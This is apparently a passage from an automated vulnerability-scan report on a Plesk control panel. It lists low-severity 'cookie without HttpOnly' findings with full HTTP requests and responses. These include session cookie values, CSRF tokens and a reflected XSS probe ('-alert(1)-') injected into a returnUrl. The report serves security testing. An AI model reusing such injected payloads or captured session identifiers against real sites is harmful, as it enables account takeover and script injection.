           <DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up the data related to the subscription vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/create/&#039;); return false;" style=""><BUTTON name="bname_backup-now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/create/&#039;); return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV>
           <DIV class="commonButton" id="bid-backup-schedule" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for scheduled backup.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/schedule/&#039;); return false;" style=""><BUTTON name="bname_backup-schedule" id="buttonid-backup-schedule" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/schedule/&#039;); return false;">Scheduled Backup Settings</BUTTON><SPAN id="spanid-backup-schedule">Scheduled Backup Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-upload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Upload a backup file from your local computer to the server backup repository.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/upload/&#039;); return false;" style=""><BUTTON name="bname_upload" id="buttonid-upload" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/upload/&#039;); return false;">Upload Files to Server Repository</BUTTON><SPAN id="spanid-upload">Upload Files to Server Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-ftp-settings" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for personal remote FTP repository where backup files should be stored.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-settings" id="buttonid-ftp-settings" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/properties/&#039;); return false;">Personal FTP Repository Settings</BUTTON><SPAN id="spanid-ftp-settings">Personal FTP Repository Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-dbbackup-repository" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up and restore databases.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dbbackup/&#039;); return false;" style=""><BUTTON name="bname_dbbackup-repository" id="buttonid-dbbackup-repository" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dbbackup/&#039;); return false;">Database Backup Repository</BUTTON><SPAN id="spanid-dbbackup-repository">Database Backup Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-refresh" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Refresh data on the screen.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/&#039;); return false;" style=""><BUTTON name="bname_refresh" id="buttonid-refresh" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/&#039;); return false;">Refresh</BUTTON><SPAN id="spanid-refresh">Refresh</SPAN></DIV>
       </div>
   </td></tr>
   </table>
   </fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Backups</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0">
       <tr><td>
           <div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/domain@1/backup/local-repository/" onClick=";lon();"><span>Server Repository</span></a></li><li><A href="/plesk/client@2/domain@1/backup/ftp-repository/" onClick=";lon();"><span>Personal FTP Repository</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/backup/task@/" onClick=";lon();"><span>Current Backup Tasks</span></a></li></ul></div></div>
       </td></tr>
       <tr><td>
           <div id="list">
               <script>
           function a(event) {tooltip.set(event, [{"type":"string","string":"This is a valid backup. Data can be restored from this backup."}]);}
           function b(event) {tooltip.set(event, [{"type":"string","string":"This is not a valid backup. Data cannot be restored from this file."}]);}
       </script><div class="paging pagingTop noList">No backups</div><div class="paging pagingBottom noList"></div><script>SetCookie("backuplocalrepositorylist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function BackupLocalRepositoryListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function BackupLocalRepositoryListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function BackupLocalRepositoryListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.BackupLocalRepositoryListSelectAll.checked;
                           BackupLocalRepositoryListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function BackupLocalRepositoryListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function BackupLocalRepositoryListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   BackupLocalRepositoryListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSearchShow()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function BackupLocalRepositoryListSearchHide()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function BackupLocalRepositoryListRemove(f)
           {
               if (0 == BackupLocalRepositoryListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/backup/local-repository/";
               lsubmit(f);
               return false;
           }
       </script>
           </div>
       </td></tr>        
       </table>
   </fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.17. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/schedule/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/schedule/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/schedule/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/ftp-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:40:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:40:14 GMT
Connection: close
Content-Length: 20180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Frootf16ee%27-alert%281%29-%2737b7e59ff57%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span><IMG src="/skins/default/plesk/icons/off.gif" width="16" height="16" alt="off.gif" title="" onMouseMove="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This scheduled backup task is not active&quot;&#125;]);" onMouseOut="tooltip.hide();">Scheduled Backup Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.schedule/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function backupPeriodChanged()
{
   if ( $('fid-backup_period').value == 604800) {
       $('weeklyBlock').show();
       $('monthlyBlock').hide();
   } else if ( $('fid-backup_period').value == 2592000) {
       $('weeklyBlock').hide();
       $('monthlyBlock').show();
   } else {
       $('weeklyBlock').hide();
       $('monthlyBlock').hide();
   }
}

function splitBackupChanged()
{
   if ( $('fid-split_size_on').checked ) {
       $('fid-split_size').enable();
   } else {
       $('fid-split_size').disable();
   }
}

function suspendDomainChanged()
{
   if ( $('fid-suspend_domain_checkbox').checked ) {
       $('fid-suspend').value = "true";
       $('suspend_domain_warning').show();
   } else {
       $('fid-suspend').value = "false";
       $('suspend_domain_warning').hide();
   }
}

function initScreen()
{
   Event.observe('fid-backup_period', 'keypress', backupPeriodChanged);
   Event.observe('fid-backup_period', 'change', backupPeriodChanged);
   Event.observe('fid-suspend_domain_checkbox', 'click', suspendDomainChanged);
   backupPeriodChanged();
   splitBackupChanged();
   suspendDomainChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/schedule/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Schedule</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr>
   <td class="name"><label for="fid-backup_enable">Activate this backup task</label></td>
   <td><input type="checkbox" class="checkbox" name="backup_enable" id="fid-backup_enable" value="true" /></td>    
</tr>

<tr >
   <td class="name"><label for="fid-backup_period">Backup period</label></td>
   <td><select name="backup_period" id="fid-backup_period" >    <option value='86400' SELECTED>Daily</option>
   <option value='604800'>Weekly</option>
   <option value='2592000'>Monthly</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-backup_hour">Start backup creation at (HH:mm)&nbsp;<span class="required">*</span></label></td>
   <td>
       <input type="text" name="backup_hour" id="fid-backup_hour" value="14" size="2" maxlength="2" />
       :
       <input type="text" name="backup_minute" id="fid-backup_minute" value="40" size="2" maxlength="2" />
       
       <span id="weeklyBlock" style="display:none;">every <select name="backup_weekday" id="fid-backup_weekday" >    <option value='7'>Sunday</option>
   <option value='1'>Monday</option>
   <option value='2'>Tuesday</option>
   <option value='3'>Wednesday</option>
   <option value='4'>Thursday</option>
   <option value='5'>Friday</option>
   <option value='6'>Saturday</option>
</select>
</span>
       <span id="monthlyBlock" style="display:none;">every <select name="backup_monthday" id="fid-backup_monthday" >    <option value='1'>first</option>
   <option value='2'>2</option>
   <option value='3'>3</option>
   <option value='4'>4</option>
   <option value='5'>5</option>
   <option value='6'>6</option>
   <option value='7'>7</option>
   <option value='8'>8</option>
   <option value='9'>9</option>
   <option value='10'>10</option>
   <option value='11'>11</option>
   <option value='12'>12</option>
   <option value='13'>13</option>
   <option value='14'>14</option>
   <option value='15'>15</option>
   <option value='16'>16</option>
   <option value='17'>17</option>
   <option value='18'>18</option>
   <option value='19'>19</option>
   <option value='20'>20</option>
   <option value='21'>21</option>
   <option value='22'>22</option>
   <option value='23'>23</option>
   <option value='24'>24</option>
   <option value='25'>25</option>
   <option value='26'>26</option>
   <option value='27'>27</option>
   <option value='28'>28</option>
   <option value='29'>29</option>
   <option value='30'>30</option>
   <option value='31'>last</option>
</select>
day of month</span>
   </td>
</tr>

</table>
</td></tr></table>

</fieldset>

<fieldset>

<legend>Backup settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-prefix">Add prefix to backup name</label></td>
   <td><input type="text" name="prefix" id="fid-prefix" value="" size="30" maxlength="255" /></td>

</tr>

<tr >
   <td class="name"><label for="fid-split_size_on">Create multivolume backup</label></td>
   <td>
       <input type="checkbox" class="checkbox" name="split_size_on" value="true" id="fid-split_size_on" onClick="splitBackupChanged();">
       <label for="fid-split_size">&nbsp;Volume size&nbsp;</label>
       <input type="text" name="split_size" id="fid-split_size" value="2047" size=8 maxlength=8 />MB
   </td>
</tr>

<tr>
   <td class="name">Store backup in</td>
   <td>

       <div class="option"><input name="repository" id="fid-store_repository-local" value="local" type="radio" class="radiobox" CHECKED>&nbsp;<label for="fid-store_repository-local">Server repository</label></div>


       <div class="option"><input name="repository" id="fid-store_repository-ftp" value="ftp" type="radio" class="radiobox" >&nbsp;<label for="fid-store_repository-ftp">Personal FTP repository</label><SPAN class="warningHint">FTP repository settings are not specified</SPAN></div>        

   </td>
</tr>

<tr >
   <td class="name"><label for="fid-max_dump_files">Maximum number of backups in repository</label></td>
   <td><input type="text" name="max_dump_files" id="fid-max_dump_files" value="" size="5" maxlength="4"><br/>
   <span class="hint">To save hard disk space, you can limit the number of backups stored in repository for each scheduled backup task. When this limit is reached, new backups replace oldest backups in the repository.</span>
   </td>
</tr>

<tr >
   <td class="name"><label for="fid-email">If any errors were encountered during the execution of this scheduled backup task, send notification e-mail to</label></td>
   <td><input type="text" name="email" id="fid-email" value="" size="30" maxlength="255"></td>
</tr>

</table>
</td></tr></table>

</fieldset>

<fieldset>

<legend>Backup content</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr>
   <td class="name">Back up</td>
   <td>
       <div class="option"><input name="backup_content" id="fid-backup_content_configuration" value="configuration" type="radio" class="radiobox" />&nbsp;<label for="fid-backup_content_configuration">Domain configuration</label></div>
       <div class="option"><input name="backup_content" id="fid-backup_content_all" value="all" type="radio" class="radiobox" CHECKED />&nbsp;<label for="fid-backup_content_all">Domain configuration and content</label></div>
   </td>
</tr>


   <tr>
       <td class="name"><label for="fid-suspend_domain_checkbox">Suspend domain until backup task is completed</label></td>
       <td class="withWarning"><input type="checkbox" class="checkbox" name="suspend_domain_checkbox" id="fid-suspend_domain_checkbox" value="true" CHECKED />
       <input type="hidden" id="fid-suspend" name="suspend" value="" />
       <span id='suspend_domain_warning' style="display:none;" class="warningHint">Domain will be unavailable during the backup process</span>
       </td>
   </tr>


</table>
</td></tr></table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.18. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/certificate@

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/certificate@ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:39 GMT
Connection: close
Content-Length: 19232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
